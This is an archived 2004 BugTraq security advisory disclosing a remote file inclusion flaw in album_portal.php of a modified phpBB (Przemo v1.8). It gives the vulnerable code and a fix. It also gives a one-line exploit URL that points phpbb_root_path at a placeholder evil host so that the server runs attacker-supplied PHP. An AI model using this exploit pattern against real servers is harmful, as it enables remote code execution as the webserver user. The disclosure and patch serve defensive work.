phpBB modified by Przemo arbitary code execution

From: Dariusz 'Officerrr' Kolasinski (ofi_at_poligon.com.pl)
Date: 04/19/04

Next message: Slackware Security Team: "[slackware-security] cvs security update (SSA:2004-108-02)"

Previous message: Thor Larholm: "RE: "Delete anti-virus and firewall software" --Microsoft"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: BugTraq <bugtraq@securityfocus.com>
Date: Mon, 19 Apr 2004 19:50:42 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --====----====----====----====----====----====----====----====----====----===--
Product: phpBB modified by Przemo
Version: v1.8
Vendor: http://przemo.org/phpBB2/
Discover by: Officerrr <officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitary code execution as webserver user)
- --====----====----====----====----====----====----====----====----====----===--
Description:

This modification is based on phpBB 2.0.X script, it contains about
200 add-ons, with ability to switch off any of them in admin`s panel.
- --====----====----====----====----====----====----====----====----====----===--
Vulnerable code:
File: album_portal.php

[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]
- --====----====----====----====----====----====----====----====----====----===--
Fix:

Change the following lines in album_portal.php file

[code]
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
[/code]

[code]
define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
[/code]
- --====----====----====----====----====----====----====----====----====----===--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php must exist on the evil_host.

- --
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFAhBFy+p+rYQE3C+ARAsX0AJ4okoVUeq0ehzHMrJJsqPd051kP8wCdE0dc
tKFC2tbN1lJSYXJb1sdttRg=
=NeZg
-----END PGP SIGNATURE-----

Next message: Slackware Security Team: "[slackware-security] cvs security update (SSA:2004-108-02)"

Previous message: Thor Larholm: "RE: "Delete anti-virus and firewall software" --Microsoft"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

newsPHP file inclusion & bad login validation
... newsPHP arbitary file inclusion & bad login validation ... Vendor Response: Not contacted yet... ... Dariusz 'Officerrr' Kolasinski ...
(Bugtraq)
HotNews arbitary file inclusion
... HotNews arbitary file inclusion. ... Vendor Response: Not contacted yet. ... Dariusz 'Officerrr' Kolasinski "Living on a razors edge, ...
(Bugtraq)
phpBB modified by Przemo arbitary code execution
... Discover by: Officerrr ... Vendor Response: Not contacted yet... ... Medium (arbitary code execution as webserver user) ...
(Bugtraq)